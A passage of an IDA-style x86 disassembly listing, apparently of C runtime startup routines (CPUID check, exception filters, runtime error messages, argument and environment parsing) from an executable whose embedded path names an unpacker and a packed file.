push edi
push esi
pushf
pop eax
mov ecx, eax
xor eax, 200000h
push eax
popf
pushf
pop edx
sub edx, ecx
jz short loc_414276
push ecx
popf
mov eax, 1
cpuid
loc_414276: ; CODE XREF: sub_414253+18�j
mov [ebp+var_4], edx
and dword_4C5B44, 0
and dword_4C5B40, 0
test byte ptr [ebp+var_4+3], 4
jz short loc_4142A3
call sub_41421E
test eax, eax
jz short loc_4142A3
xor eax, eax
inc eax
mov dword_4C5B44, eax
mov dword_4C5B40, eax
loc_4142A3: ; CODE XREF: sub_414253+38�j
; sub_414253+41�j
xor eax, eax
pop esi
pop edi
pop ebx
leave
retn
sub_414253 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4142AA(double)
sub_4142AA proc near ; CODE XREF: sub_40F5A0+7�j
; sub_40F5A0+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_421514
call sub_416B3F
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_414330
call sub_416A0F
test eax, eax
pop ecx
pop ecx
jle short loc_414313
cmp eax, 2
jle short loc_414305
cmp eax, 3
jnz short loc_414313
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Bh ; int
call sub_4168C2
add esp, 10h
jmp short loc_414377
; ---------------------------------------------------------------------------
loc_414305: ; CODE XREF: sub_4142AA+3F�j
push esi
push ebx
call sub_416B3F
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_414377
; ---------------------------------------------------------------------------
loc_414313: ; CODE XREF: sub_4142AA+3A�j
; sub_4142AA+44�j
fld [ebp+arg_0]
push ebx
fadd dbl_41BC90
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh
push 8
jmp short loc_41436F
; ---------------------------------------------------------------------------
loc_414330: ; CODE XREF: sub_4142AA+2F�j
call sub_4169D2
fstp [ebp+var_8]
fld [ebp+var_8]
pop ecx
fcomp [ebp+arg_0]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_414355
loc_414347: ; CODE XREF: sub_4142AA+AE�j
push esi
push ebx
call sub_416B3F
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_414377
; ---------------------------------------------------------------------------
loc_414355: ; CODE XREF: sub_4142AA+9B�j
test bl, 20h
jnz short loc_414347
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Bh ; int
push 10h ; int
loc_41436F: ; CODE XREF: sub_4142AA+84�j
call sub_416914
add esp, 1Ch
loc_414377: ; CODE XREF: sub_4142AA+59�j
; sub_4142AA+67�j ...
pop esi
pop ebx
leave
retn
sub_4142AA endp
; =============== S U B R O U T I N E =======================================
sub_41437B proc near ; DATA XREF: sub_4143C1�o
; .text:00421240�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41439E
cmp dword ptr [eax+10h], 3
jnz short loc_41439E
cmp dword ptr [eax+14h], 19930520h
jnz short loc_41439E
call sub_413EDF
loc_41439E: ; CODE XREF: sub_41437B+D�j
; sub_41437B+13�j ...
mov eax, dword_4C59C4
test eax, eax
jz short loc_4143BB
push eax
call sub_4162D5
test eax, eax
pop ecx
jz short loc_4143BB
push esi
call dword_4C59C4
jmp short loc_4143BD
; ---------------------------------------------------------------------------
loc_4143BB: ; CODE XREF: sub_41437B+2A�j
; sub_41437B+35�j
xor eax, eax
loc_4143BD: ; CODE XREF: sub_41437B+3E�j
pop esi
retn 4
sub_41437B endp
; =============== S U B R O U T I N E =======================================
sub_4143C1 proc near ; DATA XREF: .text:0041E024�o
push offset sub_41437B
call dword_419050 ; SetUnhandledExceptionFilter
mov dword_4C59C4, eax
xor eax, eax
retn
sub_4143C1 endp
; =============== S U B R O U T I N E =======================================
sub_4143D4 proc near ; DATA XREF: .text:0041E03C�o
push dword_4C59C4
call dword_419050 ; SetUnhandledExceptionFilter
retn
sub_4143D4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_4143E1(double)
sub_4143E1 proc near ; CODE XREF: sub_40F710+7�j
; sub_40F710+38�j
var_24 = qword ptr -24h
var_18 = qword ptr -18h
var_8 = qword ptr -8
arg_0 = qword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, 0FFFFh
push esi
push dword_421518
call sub_416B3F
fld [ebp+arg_0]
pop ecx
pop ecx
mov ebx, eax
mov eax, dword ptr [ebp+arg_0+6]
push ecx
and ax, 7FF0h
cmp ax, 7FF0h
push ecx
fstp [esp+18h+var_18]
jnz short loc_414467
call sub_416A0F
test eax, eax
pop ecx
pop ecx
jle short loc_41444A
cmp eax, 2
jle short loc_41443C
cmp eax, 3
jnz short loc_41444A
fld [ebp+arg_0]
push ebx ; int
push ecx
push ecx ; double
fstp qword ptr [esp]
push 0Ch ; int
call sub_4168C2
add esp, 10h
jmp short loc_4144AE
; ---------------------------------------------------------------------------
loc_41443C: ; CODE XREF: sub_4143E1+3F�j
push esi
push ebx
call sub_416B3F
fld [ebp+arg_0]
pop ecx
pop ecx
jmp short loc_4144AE
; ---------------------------------------------------------------------------
loc_41444A: ; CODE XREF: sub_4143E1+3A�j
; sub_4143E1+44�j
fld [ebp+arg_0]
push ebx
fadd dbl_41BC90
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch
push 8
jmp short loc_4144A6
; ---------------------------------------------------------------------------
loc_414467: ; CODE XREF: sub_4143E1+2F�j
call sub_4169D2
fstp [ebp+var_8]
fld [ebp+var_8]
pop ecx
fcomp [ebp+arg_0]
pop ecx
fnstsw ax
test ah, 44h
jp short loc_41448C
loc_41447E: ; CODE XREF: sub_4143E1+AE�j
push esi
push ebx
call sub_416B3F
fld [ebp+var_8]
pop ecx
pop ecx
jmp short loc_4144AE
; ---------------------------------------------------------------------------
loc_41448C: ; CODE XREF: sub_4143E1+9B�j
test bl, 20h
jnz short loc_41447E
fld [ebp+var_8]
push ebx ; int
sub esp, 10h
fstp qword ptr [esp+8]
fld [ebp+arg_0]
fstp [esp+24h+var_24]
push 0Ch ; int
push 10h ; int
loc_4144A6: ; CODE XREF: sub_4143E1+84�j
call sub_416914
add esp, 1Ch
loc_4144AE: ; CODE XREF: sub_4143E1+59�j
; sub_4143E1+67�j ...
pop esi
pop ebx
leave
retn
sub_4143E1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4144B2 proc near ; CODE XREF: sub_40F82D+12�p
; .text:0040F934�p ...
var_10C = byte ptr -10Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
mov eax, dword_421360
xor eax, [ebp+4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov [ebp+var_4], eax
xor edx, edx
push edi
xor eax, eax
loc_4144D0: ; CODE XREF: sub_4144B2+2B�j
cmp ecx, dword_421520[eax*8]
jz short loc_4144DF
inc eax
cmp eax, 12h
jb short loc_4144D0
loc_4144DF: ; CODE XREF: sub_4144B2+25�j
mov esi, eax
shl esi, 3
cmp ecx, dword_421520[esi]
jnz loc_414613
mov eax, dword_4C596C
cmp eax, 1
jz loc_4145EE
cmp eax, edx
jnz short loc_41450F
cmp dword_421254, 1
jz loc_4145EE
loc_41450F: ; CODE XREF: sub_4144B2+4E�j
cmp ecx, 0FCh
jz loc_414613
push 104h
lea eax, [ebp+var_10C]
push eax
push edx
mov [ebp+var_8], dl
call dword_419090 ; GetModuleFileNameA
test eax, eax
jnz short loc_414548
lea eax, [ebp+var_10C]
push offset aProgramNameUnk ; "<program name unknown>"
push eax
call sub_40D8A0
pop ecx
pop ecx
loc_414548: ; CODE XREF: sub_4144B2+81�j
lea eax, [ebp+var_10C]
push eax
lea edi, [ebp+var_10C]
call sub_40D630
inc eax
cmp eax, 3Ch
pop ecx
jbe short loc_41458A
lea eax, [ebp+var_10C]
push eax
call sub_40D630
mov edi, eax
lea eax, [ebp+var_10C]
sub eax, 3Bh
push 3
add edi, eax
push offset a___ ; "..."
push edi
call sub_40DB80
add esp, 10h
loc_41458A: ; CODE XREF: sub_4144B2+AD�j
push edi
call sub_40D630
push off_421524[esi]
mov ebx, eax
call sub_40D630
lea eax, [ebx+eax+1Ch]
pop ecx
add eax, 3
pop ecx
and eax, 0FFFFFFFCh
call sub_40D9A0
mov ebx, esp
push offset aRuntimeErrorPr ; "Runtime Error!\n\nProgram: "
push ebx
call sub_40D8A0
push edi
push ebx
call sub_40D8B0
push offset asc_41C568 ; "\n\n"
push ebx
call sub_40D8B0
push off_421524[esi]
push ebx
call sub_40D8B0
push 12010h
push offset aMicrosoftVisua ; "Microsoft Visual C++ Runtime Library"
push ebx
call sub_416BBC
add esp, 2Ch
jmp short loc_414613
; ---------------------------------------------------------------------------
loc_4145EE: ; CODE XREF: sub_4144B2+46�j
; sub_4144B2+57�j
push edx
lea eax, [ebp+arg_0]
push eax
lea esi, off_421524[esi]
push dword ptr [esi]
call sub_40D630
pop ecx
push eax
push dword ptr [esi]
push 0FFFFFFF4h
call dword_4191D0 ; GetStdHandle
push eax
call dword_4190DC ; WriteFile
loc_414613: ; CODE XREF: sub_4144B2+38�j
; sub_4144B2+63�j ...
lea esp, [ebp-118h]
mov ecx, [ebp+var_4]
xor ecx, [ebp+4]
call sub_411BA5
pop edi
pop esi
pop ebx
leave
retn
sub_4144B2 endp
; =============== S U B R O U T I N E =======================================
sub_414629 proc near ; CODE XREF: sub_40F82D+9�p
; .text:0040F92D�p
mov eax, dword_4C596C
cmp eax, 1
jz short loc_414640
test eax, eax
jnz short locret_414661
cmp dword_421254, 1
jnz short locret_414661
loc_414640: ; CODE XREF: sub_414629+8�j
push 0FCh
call sub_4144B2
mov eax, dword_4C59C8
test eax, eax
pop ecx
jz short loc_414656
call eax
loc_414656: ; CODE XREF: sub_414629+29�j
push 0FFh
call sub_4144B2
pop ecx
locret_414661: ; CODE XREF: sub_414629+C�j
; sub_414629+15�j
retn
sub_414629 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414662 proc near ; CODE XREF: .text:0040F9FD�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov edx, [ebp+arg_0]
mov eax, dword_421630
push ebx
mov ecx, offset dword_4215B0
push esi
loc_414674: ; CODE XREF: sub_414662+25�j
cmp [ecx], edx
jz short loc_414689
lea esi, [eax+eax*2]
add ecx, 0Ch
lea esi, ds:4215B0h[esi*4]
cmp ecx, esi
jb short loc_414674
loc_414689: ; CODE XREF: sub_414662+14�j
lea eax, [eax+eax*2]
lea eax, ds:4215B0h[eax*4]
cmp ecx, eax
jnb short loc_41469B
cmp [ecx], edx
jz short loc_41469D
loc_41469B: ; CODE XREF: sub_414662+33�j
xor ecx, ecx
loc_41469D: ; CODE XREF: sub_414662+37�j
test ecx, ecx
jz loc_4147C6
mov ebx, [ecx+8]
test ebx, ebx
jz loc_4147C6
cmp ebx, 5
jnz short loc_4146C1
and dword ptr [ecx+8], 0
xor eax, eax
inc eax
jmp loc_4147CF
; ---------------------------------------------------------------------------
loc_4146C1: ; CODE XREF: sub_414662+51�j
cmp ebx, 1
jz loc_4147C1
mov eax, dword_4C59CC
mov [ebp+arg_0], eax
mov eax, [ebp+arg_4]
mov dword_4C59CC, eax
mov eax, [ecx+4]
cmp eax, 8
jnz loc_4147B1
mov eax, dword_421628
mov edx, dword_42162C
add edx, eax
cmp eax, edx
jge short loc_41470C
lea esi, [eax+eax*2]
lea esi, ds:4215B8h[esi*4]
sub edx, eax
loc_414703: ; CODE XREF: sub_414662+A8�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_414703
loc_41470C: ; CODE XREF: sub_414662+93�j
mov ecx, [ecx]
cmp ecx, 0C000008Eh
mov esi, dword_421634
jnz short loc_414728
mov dword_421634, 83h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_414728: ; CODE XREF: sub_414662+B8�j
cmp ecx, 0C0000090h
jnz short loc_41473C
mov dword_421634, 81h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_41473C: ; CODE XREF: sub_414662+CC�j
cmp ecx, 0C0000091h
jnz short loc_414750
mov dword_421634, 84h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_414750: ; CODE XREF: sub_414662+E0�j
cmp ecx, 0C0000093h
jnz short loc_414764
mov dword_421634, 85h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_414764: ; CODE XREF: sub_414662+F4�j
cmp ecx, 0C000008Dh
jnz short loc_414778
mov dword_421634, 82h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_414778: ; CODE XREF: sub_414662+108�j
cmp ecx, 0C000008Fh
jnz short loc_41478C
mov dword_421634, 86h
jmp short loc_41479E
; ---------------------------------------------------------------------------
loc_41478C: ; CODE XREF: sub_414662+11C�j
cmp ecx, 0C0000092h
jnz short loc_41479E
mov dword_421634, 8Ah
loc_41479E: ; CODE XREF: sub_414662+C4�j
; sub_414662+D8�j ...
push dword_421634
push 8
call ebx ; CloseHandle
pop ecx
mov dword_421634, esi
jmp short loc_4147B8
; ---------------------------------------------------------------------------
loc_4147B1: ; CODE XREF: sub_414662+7E�j
and dword ptr [ecx+8], 0
push eax
call ebx ; CloseHandle
loc_4147B8: ; CODE XREF: sub_414662+14D�j
mov eax, [ebp+arg_0]
pop ecx
mov dword_4C59CC, eax
loc_4147C1: ; CODE XREF: sub_414662+62�j
or eax, 0FFFFFFFFh
jmp short loc_4147CF
; ---------------------------------------------------------------------------
loc_4147C6: ; CODE XREF: sub_414662+3D�j
; sub_414662+48�j
push [ebp+arg_4]
call dword_41904C ; UnhandledExceptionFilter
loc_4147CF: ; CODE XREF: sub_414662+5A�j
; sub_414662+162�j
pop esi
pop ebx
pop ebp
retn
sub_414662 endp
; =============== S U B R O U T I N E =======================================
sub_4147D3 proc near ; CODE XREF: .text:0040F9B5�p
cmp dword_4C5ED0, 0
jnz short loc_4147E1
call sub_411A10
loc_4147E1: ; CODE XREF: sub_4147D3+7�j
push esi
mov esi, dword_4C5EC0
test esi, esi
jnz short loc_4147F3
mov esi, offset word_41994E
jmp short loc_414838
; ---------------------------------------------------------------------------
loc_4147F3: ; CODE XREF: sub_4147D3+17�j
mov al, [esi]
cmp al, 22h
jnz short loc_414821
inc esi
mov al, [esi]
cmp al, 22h
jz short loc_414831
loc_414800: ; CODE XREF: sub_4147D3+45�j
test al, al
jz short loc_41481A
movzx eax, al
push eax
call sub_416CE6
test eax, eax
pop ecx
jz short loc_414813
inc esi
loc_414813: ; CODE XREF: sub_4147D3+3D�j
inc esi
mov al, [esi]
cmp al, 22h
jnz short loc_414800
loc_41481A: ; CODE XREF: sub_4147D3+2F�j
cmp byte ptr [esi], 22h
jnz short loc_414832
jmp short loc_414831
; ---------------------------------------------------------------------------
loc_414821: ; CODE XREF: sub_4147D3+24�j
cmp al, 20h
jbe short loc_414832
loc_414825: ; CODE XREF: sub_4147D3+56�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_414825
jmp short loc_414832
; ---------------------------------------------------------------------------
loc_41482D: ; CODE XREF: sub_4147D3+63�j
cmp al, 20h
ja short loc_414838
loc_414831: ; CODE XREF: sub_4147D3+2B�j
; sub_4147D3+4C�j
inc esi
loc_414832: ; CODE XREF: sub_4147D3+4A�j
; sub_4147D3+50�j ...
mov al, [esi]
test al, al
jnz short loc_41482D
loc_414838: ; CODE XREF: sub_4147D3+1E�j
; sub_4147D3+5C�j
mov eax, esi
pop esi
retn
sub_4147D3 endp
; =============== S U B R O U T I N E =======================================
sub_41483C proc near ; CODE XREF: .text:loc_40F984�p
push ebx
xor ebx, ebx
cmp dword_4C5ED0, ebx
push esi
push edi
jnz short loc_41484E
call sub_411A10
loc_41484E: ; CODE XREF: sub_41483C+B�j
mov esi, dword_4C5964
xor edi, edi
cmp esi, ebx
jnz short loc_41486C
jmp short loc_41488C
; ---------------------------------------------------------------------------
loc_41485C: ; CODE XREF: sub_41483C+34�j
cmp al, 3Dh
jz short loc_414861
inc edi
loc_414861: ; CODE XREF: sub_41483C+22�j
push esi
call sub_40D630
pop ecx
lea esi, [esi+eax+1]
loc_41486C: ; CODE XREF: sub_41483C+1C�j
mov al, [esi]
cmp al, bl
jnz short loc_41485C
lea eax, ds:4[edi*4]
push eax
call sub_40E74F
mov edi, eax
cmp edi, ebx
pop ecx
mov dword_4C5930, edi
jnz short loc_414891
loc_41488C: ; CODE XREF: sub_41483C+1E�j
or eax, 0FFFFFFFFh
jmp short loc_4148E9
; ---------------------------------------------------------------------------
loc_414891: ; CODE XREF: sub_41483C+4E�j
mov esi, dword_4C5964
push ebp
jmp short loc_4148C4
; ---------------------------------------------------------------------------
loc_41489A: ; CODE XREF: sub_41483C+8A�j
push esi
call sub_40D630
mov ebp, eax
inc ebp
cmp byte ptr [esi], 3Dh
pop ecx
jz short loc_4148C2
push ebp
call sub_40E74F
cmp eax, ebx
pop ecx
mov [edi], eax
jz short loc_4148ED
push esi
push eax
call sub_40D8A0
pop ecx
pop ecx
add edi, 4
loc_4148C2: ; CODE XREF: sub_41483C+6B�j
add esi, ebp
loc_4148C4: ; CODE XREF: sub_41483C+5C�j
cmp [esi], bl
jnz short loc_41489A
push dword_4C5964
call sub_40E359
mov dword_4C5964, ebx
mov [edi], ebx
mov dword_4C5EC4, 1
xor eax, eax
loc_4148E7: ; CODE XREF: sub_41483C+C5�j
pop ecx
pop ebp
loc_4148E9: ; CODE XREF: sub_41483C+53�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_4148ED: ; CODE XREF: sub_41483C+78�j
push dword_4C5930
call sub_40E359
mov dword_4C5930, ebx
or eax, 0FFFFFFFFh
jmp short loc_4148E7
sub_41483C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414903 proc near ; CODE XREF: sub_414A6F+54�p
; sub_414A6F+85�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_0], edx
push edi
mov [esi], edx
mov edi, ecx
mov dword ptr [ebx], 1
jz short loc_414926
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_414926: ; CODE XREF: sub_414903+18�j
; sub_414903+65�j ...
cmp byte ptr [eax], 22h
jnz short loc_414939
xor ecx, ecx
test edx, edx
setz cl
inc eax
mov edx, ecx
mov cl, 22h
jmp short loc_414966
; ---------------------------------------------------------------------------
loc_414939: ; CODE XREF: sub_414903+26�j
inc dword ptr [esi]
test edi, edi
jz short loc_414944
mov cl, [eax]
mov [edi], cl
inc edi
loc_414944: ; CODE XREF: sub_414903+3A�j
mov cl, [eax]
movzx ebx, cl
inc eax
test byte_4C5B81[ebx], 4
jz short loc_41495F
inc dword ptr [esi]
test edi, edi
jz short loc_41495E
mov bl, [eax]
mov [edi], bl
inc edi
loc_41495E: ; CODE XREF: sub_414903+54�j
inc eax
loc_41495F: ; CODE XREF: sub_414903+4E�j
test cl, cl
mov ebx, [ebp+arg_4]
jz short loc_414998
loc_414966: ; CODE XREF: sub_414903+34�j
test edx, edx
jnz short loc_414926
cmp cl, 20h
jz short loc_414974
cmp cl, 9
jnz short loc_414926
loc_414974: ; CODE XREF: sub_414903+6A�j
test edi, edi
jz short loc_41497C
and byte ptr [edi-1], 0
loc_41497C: ; CODE XREF: sub_414903+73�j
; sub_414903+96�j
and [ebp+var_4], 0
loc_414980: ; CODE XREF: sub_414903+157�j
cmp byte ptr [eax], 0
jz loc_414A5F
loc_414989: ; CODE XREF: sub_414903+93�j
mov cl, [eax]
cmp cl, 20h
jz short loc_414995
cmp cl, 9
jnz short loc_41499B
loc_414995: ; CODE XREF: sub_414903+8B�j
inc eax
jmp short loc_414989
; ---------------------------------------------------------------------------
loc_414998: ; CODE XREF: sub_414903+61�j
dec eax
jmp short loc_41497C
; ---------------------------------------------------------------------------
loc_41499B: ; CODE XREF: sub_414903+90�j
cmp byte ptr [eax], 0
jz loc_414A5F
cmp [ebp+arg_0], 0
jz short loc_4149B3
mov ecx, [ebp+arg_0]
add [ebp+arg_0], 4
mov [ecx], edi
loc_4149B3: ; CODE XREF: sub_414903+A5�j
inc dword ptr [ebx]
loc_4149B5: ; CODE XREF: sub_414903+145�j
xor ebx, ebx
inc ebx
xor edx, edx
jmp short loc_4149BE
; ---------------------------------------------------------------------------
loc_4149BC: ; CODE XREF: sub_414903+BE�j
inc eax
inc edx
loc_4149BE: ; CODE XREF: sub_414903+B7�j
cmp byte ptr [eax], 5Ch
jz short loc_4149BC
cmp byte ptr [eax], 22h
jnz short loc_4149EE
test dl, 1
jnz short loc_4149EC
cmp [ebp+var_4], 0
jz short loc_4149DF
lea ecx, [eax+1]
cmp byte ptr [ecx], 22h
jnz short loc_4149DF
mov eax, ecx
jmp short loc_4149E1
; ---------------------------------------------------------------------------
loc_4149DF: ; CODE XREF: sub_414903+CE�j
; sub_414903+D6�j
xor ebx, ebx
loc_4149E1: ; CODE XREF: sub_414903+DA�j
xor ecx, ecx
cmp [ebp+var_4], ecx
setz cl
mov [ebp+var_4], ecx
loc_4149EC: ; CODE XREF: sub_414903+C8�j
shr edx, 1
loc_4149EE: ; CODE XREF: sub_414903+C3�j
test edx, edx
jz short loc_4149FF
loc_4149F2: ; CODE XREF: sub_414903+FA�j
test edi, edi
jz short loc_4149FA
mov byte ptr [edi], 5Ch
inc edi
loc_4149FA: ; CODE XREF: sub_414903+F1�j
inc dword ptr [esi]
dec edx
jnz short loc_4149F2
loc_4149FF: ; CODE XREF: sub_414903+ED�j
mov cl, [eax]
test cl, cl
jz short loc_414A4D
cmp [ebp+var_4], 0
jnz short loc_414A15
cmp cl, 20h
jz short loc_414A4D
cmp cl, 9
jz short loc_414A4D
loc_414A15: ; CODE XREF: sub_414903+106�j
test ebx, ebx
jz short loc_414A47
test edi, edi
jz short loc_414A36
movzx edx, cl
test byte_4C5B81[edx], 4
jz short loc_414A2F
mov [edi], cl
inc edi
inc eax
inc dword ptr [esi]
loc_414A2F: ; CODE XREF: sub_414903+124�j
mov cl, [eax]
mov [edi], cl
inc edi
jmp short loc_414A45
; ---------------------------------------------------------------------------
loc_414A36: ; CODE XREF: sub_414903+118�j
movzx ecx, cl
test byte_4C5B81[ecx], 4
jz short loc_414A45
inc eax
inc dword ptr [esi]
loc_414A45: ; CODE XREF: sub_414903+131�j
; sub_414903+13D�j
inc dword ptr [esi]
loc_414A47: ; CODE XREF: sub_414903+114�j
inc eax
jmp loc_4149B5
; ---------------------------------------------------------------------------
loc_414A4D: ; CODE XREF: sub_414903+100�j
; sub_414903+10B�j ...
test edi, edi
jz short loc_414A55
and byte ptr [edi], 0
inc edi
loc_414A55: ; CODE XREF: sub_414903+14C�j
inc dword ptr [esi]
mov ebx, [ebp+arg_4]
jmp loc_414980
; ---------------------------------------------------------------------------
loc_414A5F: ; CODE XREF: sub_414903+80�j
; sub_414903+9B�j
mov eax, [ebp+arg_0]
test eax, eax
jz short loc_414A69
and dword ptr [eax], 0
loc_414A69: ; CODE XREF: sub_414903+161�j
inc dword ptr [ebx]
pop edi
pop ebx
leave
retn
sub_414903 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414A6F proc near ; CODE XREF: .text:0040F973�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
xor edi, edi
cmp dword_4C5ED0, edi
jnz short loc_414A86
call sub_411A10
loc_414A86: ; CODE XREF: sub_414A6F+10�j
and byte_4C5AD4, 0
push 104h
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push esi
push edi
call dword_419090 ; GetModuleFileNameA
mov eax, dword_4C5EC0
cmp eax, edi
mov off_4C5940, esi
jz short loc_414AB5
cmp byte ptr [eax], 0
mov ebx, eax
jnz short loc_414AB7
loc_414AB5: ; CODE XREF: sub_414A6F+3D�j
mov ebx, esi
loc_414AB7: ; CODE XREF: sub_414A6F+44�j
lea eax, [ebp+var_4]
push eax
push edi
lea esi, [ebp+var_8]
xor ecx, ecx
mov eax, ebx
call sub_414903
mov esi, [ebp+var_4]
mov eax, [ebp+var_8]
shl esi, 2
add eax, esi
push eax
call sub_40E74F
mov edi, eax
add esp, 0Ch
test edi, edi
jnz short loc_414AE7
or eax, 0FFFFFFFFh
jmp short loc_414B0C
; ---------------------------------------------------------------------------
loc_414AE7: ; CODE XREF: sub_414A6F+71�j
lea eax, [ebp+var_4]
push eax
lea ecx, [esi+edi]
push edi
lea esi, [ebp+var_8]
mov eax, ebx
call sub_414903
mov eax, [ebp+var_4]
dec eax
pop ecx
mov dword_4C5924, eax
pop ecx
mov dword_4C5928, edi
xor eax, eax
loc_414B0C: ; CODE XREF: sub_414A6F+76�j
pop edi
pop esi
pop ebx
leave
retn
sub_414A6F endp
; =============== S U B R O U T I N E =======================================
sub_414B11 proc near ; CODE XREF: .text:0040F969�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
mov eax, dword_4C5AD8
push ebx
push ebp
push esi
push edi
mov edi, dword_41903C
xor ebx, ebx
xor esi, esi
cmp eax, ebx
push 2
pop ebp
jnz short loc_414B5A
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_414B41
mov dword_4C5AD8, 1
jmp short loc_414B5F
; ---------------------------------------------------------------------------
loc_414B41: ; CODE XREF: sub_414B11+22�j
call dword_4190AC ; RtlGetLastWin32Error
cmp eax, 78h
jnz short loc_414B55
mov eax, ebp
mov dword_4C5AD8, eax
jmp short loc_414B5A
; ---------------------------------------------------------------------------
loc_414B55: ; CODE XREF: sub_414B11+39�j
mov eax, dword_4C5AD8
loc_414B5A: ; CODE XREF: sub_414B11+1A�j
; sub_414B11+42�j
cmp eax, 1
jnz short loc_414BDC
loc_414B5F: ; CODE XREF: sub_414B11+2E�j
cmp esi, ebx
jnz short loc_414B6B
call edi ; GetEnvironmentStringsW
mov esi, eax
cmp esi, ebx
jz short loc_414BE4
loc_414B6B: ; CODE XREF: sub_414B11+50�j
cmp [esi], bx
mov eax, esi
jz short loc_414B80
loc_414B72: ; CODE XREF: sub_414B11+66�j
; sub_414B11+6D�j
add eax, ebp
cmp [eax], bx
jnz short loc_414B72
add eax, ebp
cmp [eax], bx
jnz short loc_414B72
loc_414B80: ; CODE XREF: sub_414B11+5F�j
mov edi, dword_419058
push ebx
push ebx
push ebx
sub eax, esi
push ebx
sar eax, 1
inc eax
push eax
push esi
push ebx
push ebx
mov [esp+38h+var_4], eax
call edi ; WideCharToMultiByte
mov ebp, eax
cmp ebp, ebx
jz short loc_414BD1
push ebp
call sub_40E74F
cmp eax, ebx
pop ecx
mov [esp+18h+var_8], eax
jz short loc_414BD1
push ebx
push ebx
push ebp
push eax
push [esp+28h+var_4]
push esi
push ebx
push ebx
call edi ; WideCharToMultiByte
test eax, eax
jnz short loc_414BCD
push [esp+18h+var_8]
call sub_40E359
pop ecx
mov [esp+18h+var_8], ebx
loc_414BCD: ; CODE XREF: sub_414B11+AC�j
mov ebx, [esp+18h+var_8]
loc_414BD1: ; CODE XREF: sub_414B11+8C�j
; sub_414B11+9B�j
push esi
call dword_419040 ; FreeEnvironmentStringsW
mov eax, ebx
jmp short loc_414C2C
; ---------------------------------------------------------------------------
loc_414BDC: ; CODE XREF: sub_414B11+4C�j
cmp eax, ebp
jz short loc_414BE8
cmp eax, ebx
jz short loc_414BE8
loc_414BE4: ; CODE XREF: sub_414B11+58�j
; sub_414B11+E1�j
xor eax, eax
jmp short loc_414C2C
; ---------------------------------------------------------------------------
loc_414BE8: ; CODE XREF: sub_414B11+CD�j
; sub_414B11+D1�j
call dword_419044 ; GetEnvironmentStrings
mov esi, eax
cmp esi, ebx
jz short loc_414BE4
cmp [esi], bl
jz short loc_414C02
loc_414BF8: ; CODE XREF: sub_414B11+EA�j
; sub_414B11+EF�j
inc eax
cmp [eax], bl
jnz short loc_414BF8
inc eax
cmp [eax], bl
jnz short loc_414BF8
loc_414C02: ; CODE XREF: sub_414B11+E5�j
sub eax, esi
inc eax
mov ebp, eax
push ebp
call sub_40E74F
mov edi, eax
cmp edi, ebx
pop ecx
jnz short loc_414C18
xor edi, edi
jmp short loc_414C23
; ---------------------------------------------------------------------------
loc_414C18: ; CODE XREF: sub_414B11+101�j
push ebp
push esi
push edi
call sub_40E3A0
add esp, 0Ch
loc_414C23: ; CODE XREF: sub_414B11+105�j
push esi
call dword_419048 ; FreeEnvironmentStringsA
mov eax, edi
loc_414C2C: ; CODE XREF: sub_414B11+C9�j
; sub_414B11+D5�j
pop edi
pop esi
pop ebp
pop ebx
pop ecx
pop ecx
retn
sub_414B11 endp
; ---------------------------------------------------------------------------
align 4
; [0000003B BYTES: COLLAPSED FUNCTION __SEH_prolog. PRESS KEYPAD "+" TO EXPAND]
; [00000011 BYTES: COLLAPSED FUNCTION __SEH_epilog. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
